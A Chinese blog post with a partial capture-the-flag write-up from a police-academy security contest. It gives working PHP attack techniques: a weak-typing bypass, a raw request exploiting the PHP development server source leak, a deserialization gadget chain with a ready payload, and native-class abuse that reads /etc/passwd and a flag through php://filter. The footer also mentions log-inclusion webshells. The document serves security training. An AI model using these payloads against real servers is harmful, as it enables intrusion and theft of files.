【黄河流域公安院校网络空间安全技能挑战赛】部分wp

最新推荐文章于 2024-03-15 08:48:43 发布
最新推荐文章于 2024-03-15 08:48:43 发布
阅读量890 收藏 3
点赞数 2
分类专栏: wp 文章标签: 安全 php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/129380934
版权

文章目录

web

babyPHP

<?php
highlight_file(__FILE__);
error_reporting(0);

$num = $_GET['num'];

if (preg_match("/\'|\"|\`| |<|>|?|\^|%|\$/", $num)) {
           die("nononno");
}

if (eval("return ${num} != 2;") && $num == 0 && is_numeric($num) != true) {
 system('cat flag.php');
} else {
 echo '2';
}

仔细读题,主要考察php弱类型比较,我们可以直接传字母就行:

http://43.138.65.13:2025/?num=a

funnyPHP

我们访问的路径为:

http://47.104.14.160:3344/hint.php

image-20230305132410885

当我们访问根目录时:

image-20230305132555645

可以判断这里为: php Development Server 启动的服务

image-20230305132904876

查询得知,这里考察的是 PHP<=7.4.21 Development Server源码泄露漏洞

GET /puzzle.php HTTP/1.1 
Host: pd.research
\r\n
\r\n
GET / HTTP/1.1
\r\n
\r\n

当我们以如上方式发送数据包时,我们可以获得 puzzle.php 的源码:

image-20230305133507277

使用bp时要注意,我们要把 自动填充 content-length关闭掉

image-20230305133431311

源码如下:

<?php
error_reporting(0);

class A{
    public $sdpc = ["welcome" => "yeah, something hidden."];

    function __call($name, $arguments)
    {
        $this->$name[$name]();
    }

}


class B{
    public $a;

    function __construct()
    {
        $this->a = new A();
    }

    function __toString()
    {
        echo $this->a->sdpc["welcome"]; //对大家表示欢迎
    }

}

class C{
    public $b;
    protected $c;

    function __construct(){
        $this->c = new B();
    }

    function __destruct(){
        $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c; //变着法欢迎大家
    }
}

class Evil{
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}


if(isset($_POST['sdpc'])) {
    unserialize($_POST['sdpc']);
} else {
    serialize(new C());
}


?>

这是一个反序列化漏洞,我们可以如下构造:

<?php
error_reporting(0);

class A
{
    public $sdpc;

    function __construct() {
        $this->sdpc = array("sdpc" => array(new Evil(),'getflag'));
    }//注意修改$sdpc的值为一个数组 
    //array('sdpc'=>array(new Evil(),'getflag'))

    function __call($name, $arguments)
    {

        $name[$name]();
    }
}


class B
{
    public $a;

    function __construct()
    {
        $this->a = new A();
    }

    function __toString()
    {
        echo $this->a->sdpc["welcome"]; //对大家表示欢迎
    }
}

class C
{
    public $b;
    protected $c;

    function __construct()
    {
        $this->c = new A(); //注意修改为创建A类对象
    }

    function __destruct()
    {
        $this->b ? $this->c->sdpc('welcom') : 'welcome!' . $this->c; //给b赋值 ,触发 ___call
    }
}

class Evil
{
    function getflag()
    {
        echo '1';
        file_get_contents('/fl4g');
    }
}

$ca = new A();
$cb = new B();
$cc = new C();

$cc->b = 'sp4c1ous';


echo urlencode(serialize($cc));

payload:

sdpc=O%3A1%3A%22C%22%3A2%3A%7Bs%3A1%3A%22b%22%3Bs%3A8%3A%22sp4c1ous%22%3Bs%3A4%3A%22%00%2A%00c%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A4%3A%22sdpc%22%3Ba%3A1%3A%7Bs%3A4%3A%22sdpc%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Evil%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getflag%22%3B%7D%7D%7D%7D

这里有一个点:

<?php
class Evil
{
    function getflag()
    {
        echo '1';

    }
}
print_r(array(new Evil(),'getflag')());
//输出: 1

array(new Evil(),'getflag')()

这样子相当于 Evil对象eval调用它的getflag()方法: eval::getflag()

这里不是很懂

Ezphp

<?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);

这个地方直接要我们创建对象,但是又没有自定义类,所以我们应该寻找php原生类

最初我想到的是 ErrorException类,但是没什么用,可以用来执行xss漏洞

然后我找到了如下几个类:

遍历文件目录的类
  • DirectoryIterator
  • FilesystemIterator
  • GlobIterator
1、DirectoryIterator:

会创建一个指定目录的迭代器。当执行到echo函数时,会触发DirectoryIterator类中的 __toString() 方法,输出指定目录里面经过排序之后的第一个文件名

我们可以配合glob协议 模式匹配来寻找我们想要的文件路径:

http://43.138.65.13:2023/?g=DirectoryIterator&t=glob:///var/www/h*
//回显:html

我们想要得到路径下所有的文件、目录,需要遍历输出:

$a = new DirectoryIterator("glob:///*");
foreach($a as $f){
	echo($f->__toString().'<br>');
}
2、FilesystemIterator:

和上面差不多:

$a = new FilesystemIterator("glob:///*");
foreach($a as $f){
	echo($f->__toString().'<br>');
}
3、Globlterator

与前两个类的作用相似,GlobIterator 类也是可以遍历一个文件目录,使用方法与前两个类也基本相似。但与上面略不同的是其行为类似于 glob(),可以通过模式匹配来寻找文件路径。

在这个类中不需要配合glob伪协议,可以直接使用 传参直接给路径就行

读取文件内容的类:
SplFileObject

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

SplFileInfo 类为单个文件的信息提供了一个高级的面向对象的接口,可以用于对文件内容的遍历、查找、操作。

SplFileObject继承自 SplFileInfo

image-20230305141449069 
http://43.138.65.13:2023/?g=SplFileObject&t=/etc/passwd

读取到了 /etc/passwd 内容

这里我们可以结合php伪协议:

http://43.138.65.13:2023/?g=SplFileObject&t=php://filter/convert.base64-encode/resource=flag.php

image-20230305141633305

成功读取flag

相关文章

Misc

套娃

image-20230305143100126

解压密码在最底下

image-20230305143139692

打开txt文件,ZjRrM19rM3k= base64解密是一个假的key

我们滑倒txt文件最底下:

image-20230305143356892

有一大堆不可见的东西,在记事本打开:

image-20230305143335614

发现没有什么,这因该是零宽字符

零宽字符解密

image-20230305143503869

XzFzX0U0NXk= 解密得到key:_1s_E45y

然后我们观察一下图片,猜测是 lsb隐写

image-20230305144102200

但是 stegsolve 得到一串不知道什么得东西,我们猜测这是加密的lsb隐写,

我们可以使用 lsb隐写脚本: cloacked-pixel

结合之前我们得到的key,我们解密:

python2 lsb.py extract encode.png flag.txt _1s_E45y

image-20230305144553874

得到flag

Leekos
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黄河流域公安院校网络空间安全技能挑战赛 QAQ 题解
OrientalGlass的博客
03-05 606
这题是对python打包成的可执行程序逆向。
2023黄河流域公安院校网络空间安全技能挑战赛 PWN
Grxer的博客
03-20 363
链接:https://pan.baidu.com/s/1l3NhZ1xYwca48nf1p88iDg提取码:05zg题目开启了沙箱机制沙箱(Sandbox)是程序运行过程中的一种隔离机制,其目的是限制不可信进程和不可信代码的访问权限。计算机领域的虚拟技术,常见于安全方向。会禁用一些系统调用实现沙箱机制一种采用prctl函数调用一种是使用seccomp库函数。more。
PHP<=7.4.21 Development Server源码泄露漏洞 例题
最新发布
m0_75178803的博客
03-15 700
打开题目dirsearch扫描发现存在shell.php
黄河流域公安院校网络空间安全技能挑战赛
qq_63928796的博客
03-04 370
里让b为真就可以调用c中的sdpc方法,参数是welcom,再利用A类可以调用Evil中的getflag。将一句话木马包含在日志里并写到test.php中。php7.4有一个源码泄露的漏洞。pearcmd的利用,日志包含。考察PHP 的运算符比较级。
PHP<=7.4.21 Development Server源码泄露漏洞
这周末在做梦的博客
03-05 3398
因为特殊的原因CTF荒废了一段时间,近期总算再次捡了起来,算是从头开始了吧。近期比赛刚好遇到了这个漏洞,看国内似乎还没有过多的论述,先总结一波。
php<= 7 . 4 . 21 development server源码泄露漏洞复现
Kawakaze_JF的博客
09-19 1256
前一段时间在看羊城杯wp里了解到了这个漏洞,觉得挺有意思尝试复现一下(这里附上原漏洞地址。
Laravel 如何使用 PHP 内置的服务器启动服务
joshua317的博客
11-02 1462
本文为joshua317原创文章,转载请注明:转载自joshua317博客Laravel 如何使用 PHP 内置的服务器启动服务 - joshua317的博客 在Laravel项目中,如果你在本地安装了 PHP, 并且你想使用 PHP 内置的服务器来为你的应用程序提供服务,则可以使用 Artisan 命令 serve 。该命令会在http://localhost:8000上启动开发服务器 一、如何启动PHP内置服务器? php artisan serve 你也可以指定host和po...
黄河流域典型矿区生态空间网络优化研究——以鄂榆地区为例-论文
07-07
选取黄河流域典型矿区—鄂榆矿区为研究区,基于复杂系统与景观生态理论,结合景观生态风险评价与复杂网络分析两种方法,从宏观角度探究矿区生态修复策略。首先对研究区进行潜在复杂生态网络的提取与景观格局生态风险...
黄河流域河网shp格式矢量数据
04-04
黄河流域河网shp格式矢量数据; 黄河流域河网shp格式矢量数据; 黄河流域河网shp格式矢量数据; 数据来源于DEM提取获得,源DEM数据使用格式为ASTER GDEM V3版本,分辨率为30米的DEM数据,通过计算流向、流量阈值等从...
黄河流域TIFF格式的DEM数据
03-03
该数据为黄河流域的DEM数据,数据格式为TIFF格式,坐标系为WGS-84坐标系,栅格数据,数据来源为ASTER GDEM V3版本,经过GIS软件拼接、重采样获得,可用于一般科研和学习使用。
黄河流域2000年河网矢量shp格式数据
07-14
黄河流域2000年河网矢量shp格式数据; 黄河流域2000年河网数据; 数据格式为shp格式,矢量数据,可直接在ArcGIS等主流GIS软件中打开使用; 坐标系为WGS-84坐标系; 该数据经过与遥感影像数据叠加对比,并进行校正,...
黄河流域2010年河网矢量shp格式数据;
07-14
黄河流域2010年河网矢量shp格式数据; 黄河流域2010年河网数据; 数据格式为*.shp(shapefile)格式,矢量数据,可直接在ArcGIS、QGIS、ENVI等主流GIS软件中打开使用; 坐标系为WGS-84坐标系; 该数据经过与遥感影像...
php.server,php-server
weixin_35543991的博客
03-23 333
Start a PHP serverphp-server Uses PHP's built-in development web server (not for production use).The Node.js process is automatically kept alive as long as the PHP server is running.Install$ npm insta...
think php启动,ThinkPHP6.0启动内置服务器 - ThinkPHP6.0快速开发手册(案例版) - php中文网手册...
weixin_36213081的博客
03-12 1270
启动内置服务器启动内置服务器。启动内置服务器命令行切换到应用根目录后,输入:>phpthinkrun如果启动成功,会输出下面信息,并显示web目录位置。ThinkPHPDevelopmentserverisstartedOnYoucanexitwith`CTRL-C`Documentrootis:D:\WWW\tp6/public然后你可以直接在浏览器里面访问h...
websocket同步_同步站点中的Websocket
culi3118的博客
08-31 400
websocket 同步This article was peer reviewed by Wern Ancheta. Thanks to all of SitePoint’s peer reviewers for making SitePoint content the best it can be! 本文由Wern Ancheta进行同行评审 。 感谢所有SitePoint的同行评审人员使S...
php自带的server,php自带的webserver
weixin_34260071的博客
03-11 257
笔者不喜欢这样的学习方式:认识一个命令,然后把它的大部分用法学一下。理由很明确:其一枯燥,其二不知所为何用,其三笔者学习能力尤其记忆能力比较差。笔者同时深知,学习方法只是因时因人因阶段而异,没有所谓的好与坏。上面的学习方式,在某个阶段,对于笔者而言还是有用的。只是,今天这篇文章思路不是这样,它以流程目的为主导。插个题外话:大学有个同学,跟我讲过同样的学习方法。很荣幸认识这样的人,给我以启迪;很庆...
PHP常用SERVER解析
梦华空影的博客
06-05 1032
最近在折腾一个半开源的建站程序(什么叫半开源?你懂得!),给客户把模板做好了,网站放到服务器上了,客户那边把数据也都上传了很多,但是突然发现分页出现了问题,域名成了 localhost ,然后就是各种查找原因,重新安装部署,问题依旧没法解决,将文件和数据库全部搬到本地来确是好好的。 折腾了好久,最后没办法了看了看分页程序是怎么写的,原来是 _SERVER[“SERVER_NAME”] 惹的祸,服务器是 linux 的,_SERVER[“SERVER_NAME”] 的值是 Apache 的 httpd.con
arcgis黄河流域边界数据
01-10
黄河流域边界数据是用来描述黄河流域范围的空间数据,通常以矢量数据的形式存在。使用ArcGIS软件,可以找到合适的数据源,例如国家地理信息公共服务平台或其他空间数据相关网站,下载黄河流域的边界数据。 获取到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值